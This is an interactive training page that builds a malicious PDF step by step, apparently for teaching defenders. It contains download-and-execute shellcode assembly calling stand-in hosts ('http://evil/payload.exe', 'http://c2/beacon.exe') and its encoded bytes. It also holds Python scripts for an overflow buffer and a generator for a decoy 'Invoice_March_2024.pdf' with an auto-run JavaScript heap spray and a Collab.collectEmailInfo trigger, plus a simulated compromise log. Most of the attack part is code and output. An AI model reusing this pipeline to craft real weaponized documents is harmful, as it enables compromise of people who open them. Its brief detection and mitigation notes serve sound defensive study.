PDF Weaponization Workshop — Two identical PDFs side by side. The left one stays clean forever. The right one becomes a weapon as you click each tag button below. Each button adds a real PDF exploit tag — you'll see the exact code change in real time, plus the encoded version hackers actually use. Every tag shows: what it does, how it's encoded, the math behind byte offsets, and a before/after text example. Everything is static text. Nothing executes.

CLICK EACH TAG TO INJECT IT INTO THE WEAPONIZED PDF →

Alert Message

Payload URL

Spray Count

NOP Byte

Unchanged Added this step Added earlier Modified

📄 CLEAN.PDF — Original (never changes)

%PDF-1.4

%% Object 1: Catalog (root of document)
1 0 obj
<<
  /Type /Catalog
  /Pages 2 0 R
>>
endobj

%% Object 2: Page Tree
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj

%% Object 3: Page definition
3 0 obj
<< /Type /Page /Parent 2 0 R
   /MediaBox [0 0 612 792]
   /Contents 5 0 R
   /Resources << /Font << /F1 4 0 R >> >> >>
endobj

%% Object 4: Font
4 0 obj
<< /Type /Font /Subtype /Type1 /BaseFont /Helvetica >>
endobj

%% Object 5: Page content stream
5 0 obj
<< /Length 194 >>
stream
BT /F1 24 Tf 100 700 Td
  (INVOICE #2024-0582) Tj
  /F1 11 Tf 0 -30 Td (Acme Corp) Tj
  0 -20 Td (Date: March 15, 2024) Tj
  0 -40 Td (Security Audit ... $4,500) Tj
  0 -18 Td (Pen Test .......... $3,200) Tj
  0 -18 Td (Report ............ $1,800) Tj
  0 -25 Td /F1 13 Tf (TOTAL: $9,500) Tj
ET
endstream
endobj

%% Object 6: Document Info
6 0 obj
<< /Title (Invoice) /Author (Acme Corp) >>
endobj

%% Cross-Reference Table
xref
0 7
0000000000 65535 f
0000000009 00000 n  ← Obj 1 at byte 9
0000000058 00000 n  ← Obj 2 at byte 58
0000000115 00000 n  ← Obj 3 at byte 115
0000000266 00000 n  ← Obj 4 at byte 266
0000000333 00000 n  ← Obj 5 at byte 333
0000000580 00000 n  ← Obj 6 at byte 580
trailer
<< /Size 7 /Root 1 0 R /Info 6 0 R >>
startxref 663
%%EOF

💀 WEAPON.PDF — Step ⓪: Identical Copy

🧮 The Math — Byte Offset Calculations

Heap Spray fills the process's heap memory with hundreds of megabytes of attacker-controlled data. Each block contains a long NOP sled (0x90 = "no operation" — CPU does nothing and moves to the next byte) followed by the shellcode. When the buffer overflow hijacks EIP to an address like 0x0c0c0c0c, it lands somewhere in the sprayed heap. The NOP sled "catches" the jump — no matter where in the block it lands, the CPU slides forward through NOPs until it hits the shellcode. Change the values below and watch the JavaScript code + memory visualization update.

Spray Blocks

Block Size (hex)

NOP Byte (hex)

Target Addr

🧱 HEAP SPRAY JAVASCRIPT (runs inside PDF)

📊 HEAP MEMORY LAYOUT AFTER SPRAY

App data Free NOP sled Shellcode

Shellcode is raw machine code — the CPU executes it directly, byte by byte. There's no compiler, no interpreter. Each byte is an x86 instruction. The attacker crafts these bytes to perform specific actions: find kernel32.dll in memory, resolve API addresses, call WinExec or URLDownloadToFile. Below is an educational representation — the hex bytes map to real x86 instructions, annotated so you can see exactly what each byte does. This is display-only. Nothing executes.

Payload Action (demo)

🔩 SHELLCODE — Hex Dump + x86 Instructions

📖 INSTRUCTION-BY-INSTRUCTION WALKTHROUGH

How it connects: This shellcode sits at the end of each NOP-sled block in the heap spray (Tab 3). When the buffer overflow (Tab 1) hijacks EIP → the CPU lands in the heap → slides through NOPs → hits these bytes → executes the instructions above → calc.exe launches. In a real exploit, this would be cmd.exe /c powershell -ep bypass -c "IEX(...)" downloading a RAT. In our demo, it just opens Calculator. The entire chain: Buffer Overflow → Heap Spray → Shellcode → Payload.

🔴 Live Exploit Demonstration — Build a complete weaponized PDF from scratch, step by step. Both PDFs start identical. At each step you provide the attacker's input data — the system validates it, generates the fully encoded/obfuscated version (FUD), and injects it into the weapon PDF live. You'll see every technique: buffer overflow setup, heap spray, shellcode embedding, PDF tag injection, FlateDecode compression, and xref recalculation — all unified into one flowing demo. The left PDF and left preview never change. Static text only. Nothing executes.

📄 CLEAN.PDF — Original (never changes)

💀 WEAPON.PDF — Step ⓪: Identical Copy

CLEAN

INVOICE #2024-0582

Acme Corp — Consulting Services
Date: March 15, 2024

Service	Amount
Security Audit	$4,500
Pen Test	$3,200
Report	$1,800
TOTAL	$9,500

✓ 6 obj · 0 JS · 0 actions · 663 bytes · SAFE

CLEAN

INVOICE #2024-0582

Acme Corp — Consulting Services
Date: March 15, 2024

Service	Amount
Security Audit	$4,500
Pen Test	$3,200
Report	$1,800
TOTAL	$9,500

✓ 6 obj · 0 JS · 0 actions · 663 bytes · SAFE

⚡ Generated Exploit Code — Full Chain

Step ⓪ — No exploit code yet. Click each step and inject data to build the full exploit chain.

🏷️ Injected Techniques

No techniques injected yet. Start at Step ① →

// 07 — Exploit Crafting ⏱ 12 min · Advanced

How Attackers Build an Exploit

This section walks through the complete exploit development pipeline — the exact sequence of steps an attacker follows to go from a vulnerability discovery to a fully weaponized PDF that compromises a target system. Each step builds on the previous one: write assembly → assemble to machine code → encode the bytes → craft the overflow buffer → assemble the full payload → embed it inside a PDF structure → test the execution chain.

Understanding this pipeline is critical for defenders because each step creates artifacts that can be detected. Assembly patterns, encoding signatures, heap spray behavior, and suspicious PDF objects all generate signals that security tools can match against. The 7 steps below show exactly what the attacker creates at each stage, what it looks like, and how it works.

⚠ Educational Demonstration Only The code below is non-functional pseudo-code and simplified illustrations. No working exploit is provided. Real shellcode would need precise offsets, correct API hashes, and a target-specific vulnerability. This exists to help defenders understand attacker methodology so they can build better detections and write accurate YARA rules.

Write the Shellcode in Assembly x86 ASM

The attacker first writes the payload as raw x86 assembly — the lowest-level human-readable code that maps directly to CPU instructions. This shellcode must be position-independent (it can run from any memory address) and self-contained (it cannot rely on import tables or linker-resolved symbols). The shellcode's job is typically to find the Windows API functions it needs (LoadLibraryA, GetProcAddress, URLDownloadToFileA), then use them to download and execute a second-stage payload from the attacker's server.

Why assembly? The attacker needs the raw machine code bytes — not a compiled executable with headers, sections, and import tables. Shellcode runs in the context of a hijacked process (Adobe Reader in our case), so it must locate system DLLs at runtime by walking the PEB (Process Environment Block), a data structure every Windows process has that contains the list of loaded modules and their base addresses.

shellcode.asm — x86 NASM syntax

; ──────────────────────────────────────────────────
; Shellcode: Download & Execute via URLDownloadToFileA
; Target: Windows x86 (32-bit)
; ──────────────────────────────────────────────────
; HOW THIS WORKS:
; 1. Walk the PEB to find kernel32.dll's base address
; 2. Parse kernel32's export table to find GetProcAddress
; 3. Use GetProcAddress to resolve LoadLibraryA
; 4. Load urlmon.dll using LoadLibraryA
; 5. Resolve URLDownloadToFileA from urlmon.dll
; 6. Call URLDownloadToFileA("http://c2/beacon.exe", "C:\Temp\b.exe")
; 7. Call WinExec("C:\Temp\b.exe") to execute the download
; ──────────────────────────────────────────────────

_start:
    cld                        ; Clear direction flag
    call   find_kernel32       ; Locate kernel32.dll base

find_kernel32:
    xor    eax, eax            ; EAX = 0
    mov    eax, [fs:0x30]      ; EAX = PEB (Process Environment Block)
    mov    eax, [eax+0x0c]     ; EAX = PEB->Ldr
    mov    eax, [eax+0x14]     ; EAX = Ldr->InMemOrderModList
    mov    eax, [eax]          ; Skip first entry (ntdll.dll)
    mov    eax, [eax]          ; Second entry = kernel32.dll
    mov    eax, [eax+0x10]     ; EAX = kernel32 base address

resolve_api:
    ; Walk the Export Address Table to find functions
    mov    ebx, [eax+0x3c]     ; PE header offset
    add    ebx, eax            ; EBX = PE header
    mov    ebx, [ebx+0x78]     ; Export table RVA
    add    ebx, eax            ; EBX = Export table
    ; ... hash-based API resolution continues ...

download_exec:
    ; Call URLDownloadToFileA("http://evil/payload.exe", "C:\\Temp\\a.exe")
    push   0                   ; lpfnCB = NULL
    push   0                   ; dwReserved = 0
    push   esi                 ; szFileName (local path)
    push   edi                 ; szURL (remote URL)
    push   0                   ; pCaller = NULL
    call   [URLDownloadToFileA] ; Download the payload

    ; Execute the downloaded file
    push   esi                 ; lpCommandLine
    call   [WinExec]           ; Run it

Assemble to Machine Opcodes Opcodes

The assembler (NASM, MASM, or FASM) converts each assembly instruction into its raw byte opcode — the exact bytes the CPU will execute. This is the binary machine code. Each assembly instruction maps to a specific hex sequence defined by the Intel/AMD instruction set architecture. For example, cld (clear direction flag) always assembles to byte FC, and xor eax, eax (set EAX to zero) always assembles to 31 C0.

What the assembler produces: A flat binary file — just raw bytes, no ELF/PE headers, no sections, no imports. This is what makes shellcode different from a normal compiled program. The output is the exact sequence of bytes that will be injected into the exploit buffer and executed directly by the CPU.

assembly → opcodes (objdump output)

;  Address    Opcodes           Assembly Instruction
;  ─────────  ────────────────  ──────────────────────────
   00000000  FC                cld
   00000001  E8 82 00 00 00    call   find_kernel32
   00000006  60                pushad
   00000007  89 E5             mov    ebp, esp
   00000009  31 C0             xor    eax, eax
   0000000B  64 8B 50 30       mov    eax, [fs:0x30]  ; PEB
   0000000F  8B 52 0C          mov    edx, [edx+0x0c] ; Ldr
   00000012  8B 52 14          mov    edx, [edx+0x14]
   00000015  8B 72 28          mov    esi, [edx+0x28]
   00000018  0F B7 4A 26       movzx  ecx, [edx+0x26]
   0000001C  31 FF             xor    edi, edi
   0000001E  AC                lodsb
   0000001F  3C 61             cmp    al, 0x61
   ;  ... more instructions ...

; The raw byte sequence (the shellcode) is:
FC E8 82 00 00 00 60 89 E5 31 C0 64 8B 50 30 8B
52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF AC 3C
61 7C 02 2C 20 C1 CF 0D 01 C7 E2 F2 52 57 8B 52
10 8B 4A 3C 8B 4C 11 78 E3 48 01 D1 51 8B 59 20

Encode as Hex / URL / Unicode Encoding

The raw opcodes from Step 2 must be encoded for delivery inside the exploit vehicle. Different exploit vectors require different encoding formats because the bytes must survive the transport mechanism. A PDF JavaScript payload uses Unicode escapes (%ue8fc) because JavaScript's unescape() function converts them back to raw bytes at runtime. An RTF exploit uses hex ASCII (fce882) because RTF \\objdata fields are parsed as hex digit pairs. Web-based delivery uses URL encoding (%FC%E8) because web servers decode these in transit.

Why encoding matters: The raw bytes (like 0x00 — a null byte) would break string-based transports. Encoding ensures every byte survives delivery. The exploit code on the receiving end decodes these back to the original raw bytes before executing them.

encoding_formats.txt — same shellcode, different formats

RAW BYTES (the opcodes from Step 2):
FC E8 82 00 00 00 60 89 E5 31 C0 64 8B 50 30 8B

HEX STRING (for Python/C injection):
\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b

URL ENCODED (for web-based delivery):
%FC%E8%82%00%00%00%60%89%E5%31%C0%64%8B%50%30%8B

UNICODE ESCAPE (for JavaScript heap spray):
%ue8fc%u8200%u0000%u8960%u31e5%u64c0%u508b%u8b30
  ↑ note: bytes are swapped in pairs (little-endian)
  ↑ FC E8 becomes %ue8fc (E8 first, then FC)

BASE64 (for obfuscation in scripts):
/OiCAAAAYInlMcBki1Awi...

HEX ASCII (for RTF/OLE embedding):
fce8820000006089e531c0648b50308b

🔄 Try It: Hex Encoder — Build a Payload and See It Inside a PDF

Type any text below and watch it convert live into every hex encoding format attackers use. Below the output, a simulated PDF object view shows exactly how your encoded input would appear embedded inside a real PDF's internal structure — as a compressed JavaScript action stream.

Input (plain text or command)

→

Encoded Output (all formats)

RAW HEX (8 bytes): 63 61 6C 63 2E 65 78 65 C/PYTHON (\x format): \x63\x61\x6c\x63\x2e\x65\x78\x65 URL ENCODED: %63%61%6C%63%2E%65%78%65 UNICODE (%u, little-endian): %u6163%u636c%u652e%u6578 BASE64: Y2FsYy5leGU= HEX ASCII (for RTF/OLE): 63616c632e657865

📄 Live Preview: How Encoded Data Appears Inside a PDF

This is the PDF object structure an attacker would create. Your input text is encoded with /FlateDecode compression and embedded as a JavaScript action stream. The /OpenAction in the Catalog triggers execution when the file opens.

📄 Generated_Exploit.pdf — live preview Simulated

                                %PDF-1.7
                                %âãÏÓ
                                
                                1 0 obj
                                <<
                                  /Type /Catalog
                                  /Pages 2 0 R
                                  /OpenAction 3 0 R
                                >>
                                endobj
                                
                                % ... page objects omitted for brevity ...
                                
                                3 0 obj
                                <<
                                  /Type /Action
                                  /S /JavaScript
                                  /JS 4 0 R
                                >>
                                endobj
                                
                                4 0 obj
                                << /Length 20 /Filter /FlateDecode >>
                                stream
                                63 61 6C 63 2E 65 78 65
                                
                                
                                endstream
                                endobj
                                
                                %%EOF
                            

4 objects | 1 action | 8 payload bytes ⚠ SIMULATED

🧪 What This Demonstrates As you type, the hex bytes update inside Object 4's stream. In a real exploit, these bytes would be zlib-compressed JavaScript containing shellcode and a heap spray. The /OpenAction in Object 1 tells the PDF reader to automatically run the JavaScript in Object 3, which references the payload stream in Object 4. The user opening this PDF would see a normal page — the malicious objects are invisible to the viewer.

Craft the Overflow — Junk + EIP + NOP + Shellcode Overflow

This is the core of the exploit. The attacker needs to overflow a buffer so precisely that they overwrite the EIP (Extended Instruction Pointer) register — the 4-byte value on the stack that tells the CPU which address to return to when the current function finishes. If the attacker controls EIP, they control what code the CPU executes next.

How a buffer overflow works: When a function is called, the CPU pushes the return address (EIP) onto the stack. The function then allocates a local buffer (e.g., 256 bytes for a string). If the function copies more data into this buffer than it can hold (260+ bytes), the extra bytes "overflow" past the buffer's boundary and overwrite whatever is next on the stack — first the saved EBP (base pointer), then the saved EIP (return address). By carefully controlling the overflow, the attacker places a specific address in the EIP field. When the function tries to return, the CPU jumps to the attacker's chosen address instead of the legitimate caller.

Why 0x0C0C0C0C? In a heap spray exploit, the attacker fills hundreds of megabytes of heap memory with NOP-sled + shellcode copies. The address 0x0C0C0C0C (about 192MB into the address space) is very likely to land inside the sprayed region. Overwriting EIP with this address makes the CPU jump into the sprayed heap, where it slides through NOP instructions (0x90) until it hits the shellcode.

The Stack Before Overflow

MEMORY (low address → high address)

Stack

Local vars

Buffer[256]

Saved EBP

Saved EIP ↩

Args...

← normal state

The Stack After Overflow (Attacker's Payload)

OVERWRITTEN BY ATTACKER'S INPUT ▼

Stack

AAAA

0C0C

NOP

← JUNK DATA (fills buffer) →

EIP

NOP

SHELLCODE

↳ Junk data ("AAAA..." × 64 = 256 bytes) fills the buffer exactly. Then 4 bytes overwrite EIP with the target address (0x0C0C0C0C). After that, NOP sled provides a landing zone, followed by shellcode.

Here's how the attacker determines the exact offset to EIP — they use a cyclic pattern:

finding_eip_offset.py — determine exact overflow point

# Step 1: Generate a unique cyclic pattern
# Every 4-byte sequence is unique, so when the app crashes,
# the value in EIP tells us the exact offset

from struct import pack

# Generate pattern: Aa0Aa1Aa2Aa3Ab0Ab1Ab2...
def cyclic(length):
    pattern = ""
    for upper in "ABCDEFGHIJKLMNOP":
        for lower in "abcdefghijklmnop":
            for digit in "0123456789":
                pattern += upper + lower + digit
                if len(pattern) >= length:
                    return pattern[:length]
    return pattern

# Send this to the vulnerable app
payload = cyclic(500)
# App crashes → debugger shows: EIP = 0x39624138
# Lookup: "8Ab9" at offset 260 in the pattern
# → Buffer is 260 bytes before we hit EIP!

OFFSET = 260  # exact bytes to reach EIP

Assemble the Full Payload Python

Now the attacker combines everything from the previous steps into a single binary string — the exploit buffer. This buffer is laid out with surgical precision: exactly 260 bytes of junk (to fill the vulnerable buffer), then exactly 4 bytes that overwrite EIP with the heap spray address, then 64 bytes of NOP sled (a safety margin), then the shellcode itself. Every byte is in the exact right position. If a single byte is off, the exploit crashes the target instead of compromising it.

What this generates: A raw binary payload of ~670 bytes. The junk data fills the buffer; the EIP overwrite redirects execution; the NOP sled absorbs any address imprecision; and the shellcode does the actual work (download + execute a backdoor). This is the data that will be embedded in the PDF's JavaScript heap spray.

build_payload.py — constructing the exploit buffer

import struct

# ── Configuration ──
OFFSET  = 260          # Bytes to reach saved EIP (from Step 4)
EIP_ADDR = 0x0C0C0C0C  # Target: heap spray address
NOP_SIZE = 64          # NOP sled padding (safety margin)

# ── Shellcode (from Step 2, hex-encoded) ──
shellcode = (
    b"\xfc\xe8\x82\x00\x00\x00\x60\x89"  # cld; call; pushad
    b"\xe5\x31\xc0\x64\x8b\x50\x30\x8b"  # PEB walk
    b"\x52\x0c\x8b\x52\x14\x8b\x72\x28"  # Ldr modules
    b"\x0f\xb7\x4a\x26\x31\xff\xac\x3c"  # API resolution
    # ... ~300 more bytes ...
    b"\x57\x69\x6e\x45\x78\x65\x63\x00"  # "WinExec\0"
)

# ── Build the exploit buffer ──
payload  = b"A" * OFFSET                    # ← JUNK (fills buffer)
payload += struct.pack("<I", EIP_ADDR)      # ← EIP overwrite (4 bytes)
payload += b"\x90" * NOP_SIZE               # ← NOP sled (0x90 = NOP)
payload += shellcode                         # ← The actual shellcode

# Visual breakdown:
# [AAAA...AAAA] [0C0C0C0C] [90909090...] [FCE88200...]
#  ← 260 bytes → ← 4 bytes → ← 64 bytes → ← ~342 bytes →
#     JUNK          EIP        NOP SLED     SHELLCODE

print(f"Payload size: {len(payload)} bytes")
print(f"  Junk:      {OFFSET} bytes")
print(f"  EIP:       4 bytes → {hex(EIP_ADDR)}")
print(f"  NOP sled:  {NOP_SIZE} bytes")
print(f"  Shellcode: {len(shellcode)} bytes")

Inject Payload into a PDF Document Python PDF

The attacker uses Python to construct a malicious PDF from scratch — building each object manually and wiring them together. This is the step where the shellcode from Step 5 gets wrapped inside JavaScript (for heap spray delivery), compressed with zlib (FlateDecode), and embedded as a PDF stream object. The PDF's Catalog object gets a /OpenAction entry pointing to a JavaScript Action object that references the compressed stream. When Adobe Reader opens this file, it follows the chain: Catalog → /OpenAction → JavaScript Action → decompress stream → execute JavaScript → heap spray → trigger vuln → shellcode runs.

What this generates: A complete, valid PDF file (Invoice_March_2024.pdf) that any PDF reader will open without error. It displays normal content on screen while the hidden JavaScript payload executes in the background. The Python code below shows every line needed to generate this file — each PDF object is built as raw bytes and concatenated together.

generate_malicious_pdf.py — PDF exploit generator

import zlib
import struct

# ── Convert shellcode to JavaScript unescape format ──
def to_js_unescape(shellcode_bytes):
    """Convert raw bytes to %uXXXX format (little-endian pairs)"""
    js = ""
    for i in range(0, len(shellcode_bytes), 2):
        if i + 1 < len(shellcode_bytes):
            # Swap bytes for little-endian: AB CD → %uCDAB
            js += f"%u{shellcode_bytes[i+1]:02x}{shellcode_bytes[i]:02x}"
        else:
            js += f"%u00{shellcode_bytes[i]:02x}"
    return js

# ── Build the malicious JavaScript ──
sc_js = to_js_unescape(shellcode)
js_code = f"""
var sc = unescape("{sc_js}");

// Heap spray: fill memory with NOP sled + shellcode
var nop = unescape("%u0c0c%u0c0c");
while (nop.length < 0x100000) nop += nop;
var block = nop.substring(0, 0x100000 - sc.length);

var spray = new Array();
for (var i = 0; i < 200; i++) {{
    spray[i] = block + sc;
}}

// Trigger the vulnerability
Collab.collectEmailInfo({{subj: "A".repeat(0x4141)}});
"""

# ── Compress the JavaScript (FlateDecode) ──
js_compressed = zlib.compress(js_code.encode('latin-1'))

# ── Build the PDF structure ──
pdf = b"%PDF-1.7\n"

# Object 1: Catalog with /OpenAction (auto-execute trigger)
pdf += b"1 0 obj\n"
pdf += b"<< /Type /Catalog /Pages 2 0 R"
pdf += b" /OpenAction 4 0 R"                # ← auto-runs on open!
pdf += b" >>\nendobj\n\n"

# Object 2: Pages
pdf += b"2 0 obj\n"
pdf += b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>\n"
pdf += b"endobj\n\n"

# Object 3: Page (shows innocent invoice content)
pdf += b"3 0 obj\n"
pdf += b"<< /Type /Page /Parent 2 0 R"
pdf += b" /MediaBox [0 0 612 792] >>\n"
pdf += b"endobj\n\n"

# Object 4: JavaScript Action (the exploit!)
pdf += b"4 0 obj\n"
pdf += b"<< /Type /Action /S /JavaScript /JS 5 0 R >>\n"
pdf += b"endobj\n\n"

# Object 5: Compressed JavaScript stream (FlateDecode)
pdf += b"5 0 obj\n"
pdf += f"<< /Length {len(js_compressed)}".encode()
pdf += b" /Filter /FlateDecode >>\n"
pdf += b"stream\n"
pdf += js_compressed                           # ← hex bytes!
pdf += b"\nendstream\nendobj\n\n"

# Write the xref table and trailer
pdf += b"xref\n0 6\n"
pdf += b"trailer << /Size 6 /Root 1 0 R >>\n"
pdf += b"%%EOF"

# ── Save the weaponized PDF ──
with open("Invoice_March_2024.pdf", "wb") as f:
    f.write(pdf)

print("[+] Malicious PDF generated: Invoice_March_2024.pdf")
print(f"[+] JavaScript payload: {len(js_code)} bytes")
print(f"[+] Compressed stream:  {len(js_compressed)} bytes")
print(f"[+] Total PDF size:     {len(pdf)} bytes")

Victim Opens the PDF — The Kill Chain Execution

This is the moment of truth. The victim double-clicks Invoice_March_2024.pdf in their email. Adobe Reader opens it and displays a normal-looking invoice page. But in the background, at CPU speed (billions of operations per second), the exploit chain fires. The trace below shows every step the CPU takes — from parsing the PDF header, to traversing the object tree, to decompressing and executing JavaScript, to spraying the heap, to triggering the vulnerability that overwrites EIP, to the shellcode walking the PEB to find Windows APIs, to the final download-and-execute of the attacker's backdoor. Each line is a real event in the process.

Why this is hard to detect: Everything happens within the legitimate AcroRd32.exe process. No new .exe is dropped until the very end. The JavaScript runs inside Adobe Reader's embedded SpiderMonkey engine. The heap spray uses normal memory allocation calls. The vulnerability trigger (Collab.collectEmailInfo) is a legitimate PDF API function. Only the final HTTP download and child process spawn create detectable external artifacts.

execution_trace.log — what the CPU sees

──── PDF OPEN ────
[AcroRd32] Parsing %PDF-1.7 header... OK
[AcroRd32] Loading object 1 (Catalog)
[AcroRd32] Found /OpenAction → Object 4
[AcroRd32] Object 4: /Action /JavaScript → Object 5
[AcroRd32] Object 5: FlateDecode stream, decompressing...

──── JAVASCRIPT ENGINE ────
[SpiderMonkey] Executing decoded JavaScript...
[SpiderMonkey] unescape() → 342 bytes of shellcode decoded
[SpiderMonkey] Heap spray: allocating 200 × 1MB blocks...
[SpiderMonkey] Memory at 0x0C0C0C0C: 0C 0C 0C 0C 0C 0C ... ✓

──── VULNERABILITY TRIGGER ────
[SpiderMonkey] Calling Collab.collectEmailInfo()
[AcroRd32] BUFFER OVERFLOW in CollabEmailInfo()
[AcroRd32] Stack:
   ESP: 0x0012F8A0  [41 41 41 41 41 41 41 41]  ← junk
   EBP: 0x41414141  [overwritten with AAAA]     ← junk
   EIP: 0x0C0C0C0C  [overwritten by attacker!]  ← HIJACKED

──── CPU FOLLOWS EIP ────
[CPU] EIP = 0x0C0C0C0C → jumping to heap...
[CPU] Executing: 0C 0C  → OR AL, 0x0C  (harmless NOP)
[CPU] Executing: 0C 0C  → OR AL, 0x0C  (harmless NOP)
[CPU] Executing: 0C 0C  → OR AL, 0x0C  (sliding...)
[CPU] ...sliding through NOP sled...
[CPU] HIT SHELLCODE at 0x0C0D0000
[CPU] FC        → cld
[CPU] E8 82 00  → call find_kernel32
[CPU] 60        → pushad
[CPU] 89 E5     → mov ebp, esp
[CPU] 31 C0     → xor eax, eax
[CPU] 64 8B 50 30 → mov eax, [fs:0x30]  ; PEB
... resolving APIs ... downloading payload ...
[CPU] WinExec("C:\\Temp\\backdoor.exe") → GAME OVER

The Complete Exploit Buffer — Annotated

Here's the final payload laid out byte-by-byte, exactly as it exists in memory when the overflow happens:

OFFSET HEXADECIMAL BYTES ASCII 0000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA ← JUNK 0000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA DATA ... 41 41 41 41 ... (× 260 bytes total) ... 41 41 41 (fills buffer) 0000104 0C 0C 0C 0C .... ← EIP OVERWRITE! 0000108 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ ← NOP SLED 0000118 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ (0x90 = NOP) ... 90 90 90 90 ... (× 64 bytes) ... 90 90 90 90 90 (landing zone) 0000148 FC E8 82 00 00 00 60 89 E5 31 C0 64 8B 50 30 8B ......`.1.d.P0. ← SHELLCODE START 0000158 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF AC 3C R..R..r(..J&1..< (PEB walk) 0000168 61 7C 02 2C 20 C1 CF 0D 01 C7 E2 F2 52 57 8B 52 a|., .......RW.R (API resolve) ... ... (~342 bytes of shellcode) ... (download+exec)

🔧 Interactive: Full Pipeline Generator

Watch the complete exploit generation pipeline — from assembly to encoded hex to PDF injection — all in one animated sequence.

[SIMULATED] Full Exploit Development Pipeline ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ >> STEP 1: Writing shellcode assembly... ─────────────────────────────────────── [ASM] _start: [ASM] cld [ASM] call find_kernel32 [ASM] xor eax, eax [ASM] mov eax, [fs:0x30] ; PEB [ASM] mov eax, [eax+0x0c] ; Ldr [ASM] ... 47 instructions written [ASM] ✓ shellcode.asm saved (47 instructions) >> STEP 2: Assembling to opcodes... ─────────────────────────────────── [NASM] nasm -f bin shellcode.asm -o shellcode.bin [NASM] Assembled: 342 bytes [NASM] First 16 bytes: FC E8 82 00 00 00 60 89 E5 31 C0 64 8B 50 30 8B [NASM] ✓ No null bytes detected (good for string-based overflows) [NASM] ✓ shellcode.bin generated >> STEP 3: Encoding shellcode... ──────────────────────────────── [ENC] → Python hex: \xfc\xe8\x82\x00\x00\x00\x60\x89... [ENC] → URL encoded: %FC%E8%82%00%00%00%60%89%E5%31%C0%64... [ENC] → JS Unicode: %ue8fc%u8200%u0000%u8960%u31e5%u64c0... [ENC] ✓ All 3 formats generated >> STEP 4: Finding EIP offset... ──────────────────────────────── [FUZZ] Generating cyclic pattern: Aa0Aa1Aa2Aa3Ab0Ab1Ab2... [FUZZ] Sending 500-byte pattern to vulnerable app... [FUZZ] App crashed! Analyzing crash dump: [FUZZ] EIP = 0x39624138 → "8Ab9" [FUZZ] Pattern offset lookup: 260 bytes [FUZZ] ✓ EIP offset = 260 bytes >> STEP 5: Building exploit buffer... ───────────────────────────────────── [BUILD] Component 1: JUNK = "A" × 260 (fills buffer) [BUILD] Component 2: EIP = 0x0C0C0C0C (4 bytes, little-endian: \x0c\x0c\x0c\x0c) [BUILD] Component 3: NOP = 0x90 × 64 (NOP sled landing zone) [BUILD] Component 4: SC = 342 bytes (shellcode payload) [BUILD] ───────────────────────────── [BUILD] Total payload: 670 bytes [BUILD] Layout: [AAAA...×260][0C0C0C0C][9090...×64][FCE882...] [BUILD] ✓ Exploit buffer ready >> STEP 6: Generating malicious PDF... ────────────────────────────────────── [PDF] Creating %PDF-1.7 header [PDF] Object 1: /Catalog with /OpenAction → Object 4 [PDF] Object 2: /Pages → 1 page [PDF] Object 3: /Page → Invoice content (decoy) [PDF] Object 4: /Action /JavaScript → Object 5 [PDF] Object 5: JavaScript stream (heap spray + trigger) [PDF] → Embedding shellcode as unescape("%ue8fc%u8200...") [PDF] → Heap spray: 200 × 1MB blocks targeting 0x0C0C0C0C [PDF] → Trigger: Collab.collectEmailInfo() overflow [PDF] → Compressing with FlateDecode (zlib)... [PDF] → JS: 1,847 bytes → compressed: 923 bytes [PDF] Writing xref table and trailer... [PDF] ✓ Invoice_March_2024.pdf generated (4,821 bytes) >> STEP 7: Simulating victim opening PDF... ─────────────────────────────────────────── [00.000s] Adobe Reader launched [00.012s] Parsing PDF structure... 5 objects loaded [00.015s] /OpenAction detected → executing JavaScript [00.018s] JavaScript engine: decoding shellcode (342 bytes) [00.034s] Heap spray started: block 1/200... [00.892s] Heap spray complete: 200 MB allocated [00.893s] Address 0x0C0C0C0C verified → NOP sled present ✓ [00.894s] Triggering Collab.collectEmailInfo()... [00.895s] ██ BUFFER OVERFLOW ██ [00.895s] EIP overwritten: 0x0C0C0C0C [00.896s] CPU executing at 0x0C0C0C0C (NOP sled) [00.897s] Sliding... 0x0C0C0C0C → 0x0C0D0000 [00.898s] ██ SHELLCODE EXECUTING ██ [00.899s] kernel32.dll base: 0x7C800000 [00.900s] URLDownloadToFileA resolved [01.200s] Downloading payload... [01.750s] backdoor.exe saved to %TEMP% [01.780s] WinExec("backdoor.exe") called [01.800s] ██ FULL COMPROMISE IN 1.8 SECONDS ██ >> What the victim saw: An invoice for $4,250.00 >> What actually happened: Complete system takeover ⚠ THIS IS A SIMULATION — no real exploit or shellcode was generated.

🔍 How Defenders Detect This Static analysis: Tools like pdf-parser.py and peepdf extract and decode JavaScript from PDF streams, revealing heap spray patterns and suspicious API calls like Collab.collectEmailInfo.
Dynamic analysis: Sandboxes open the PDF in a monitored Adobe Reader instance and watch for shellcode behavior — child process creation, network connections, or file drops.
YARA rules: Pattern match on %u0c0c%u0c0c NOP sled signatures, /OpenAction + /JavaScript combos, and known shellcode byte sequences.

📐 Modern Exploitation: 64-bit & Mitigation Bypasses

The x86 (32-bit) examples above demonstrate core concepts. Modern targets are x86-64, with significant differences and additional mitigations:

64-bit Differences

Registers: RAX, RBX, RCX... RIP replaces EIP (64-bit wide)
Calling convention: First 4 args in RCX, RDX, R8, R9 (Windows) or RDI, RSI, RDX, RCX (Linux) — not the stack
Address space: 48-bit addresses (0x00007FFF'FFFFFFFF max) — heap spray target addresses change completely
Stack alignment: Must be 16-byte aligned before CALL — shellcode needs adjustment
NX by default: All 64-bit Windows/Linux enforce non-executable stack

Mitigations Attackers Must Bypass

ASLR: Randomizes base addresses of DLLs, stack, heap on every boot — attacker can't hardcode addresses
DEP/NX: Marks stack/heap as non-executable — shellcode on stack won't run
Stack Canaries: Random value placed before saved RIP — overflow detected before return
CFG/CET: Control Flow Guard validates indirect call targets — hijacked pointers caught
ROP: Return-Oriented Programming chains existing code gadgets instead of injecting shellcode — the modern bypass for DEP

